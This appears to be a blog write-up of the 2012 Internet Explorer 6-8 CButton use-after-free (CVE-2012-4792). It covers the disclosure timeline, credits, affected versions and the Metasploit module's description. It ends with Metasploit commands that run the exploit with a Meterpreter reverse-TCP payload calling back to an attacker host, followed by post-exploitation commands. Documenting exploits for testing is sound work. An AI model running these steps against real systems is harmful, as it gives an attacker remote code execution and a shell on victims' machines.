Timeline :

CVE reference assigned the 2012-09-06
First samples of the attack discovered in Google cache the 2012-12-07
Vulnerability discovered exploited in the wild on CFE.org around the 2012-12-26
Vulnerability details provided by binjo, Eric Romang and FireEye the 2012-12-29
Microsoft Security Advisory published the 2012-12-30
Metasploit PoC provided the 2012-12-30
Metasploit module name changed the 2012-12-31

PoC provided by :

eromang
mahmud ab rahman
sinn3r
binjo
juan vazquez

Reference(s) :

CVE-2012-4792
MSA-2794220
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability
Attack and IE 0day Informations Used Against Council on Foreign Relations
CFR WATERING HOLE ATTACK DETAILS

Affected version(s) :

nternet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

Note: The module name has change from ie_cdwnbindinfo_uaf to ie_cbutton_uaf

This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.

Commands :

use exploit/windows/browser/ie_cbutton_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sysinfo
getuid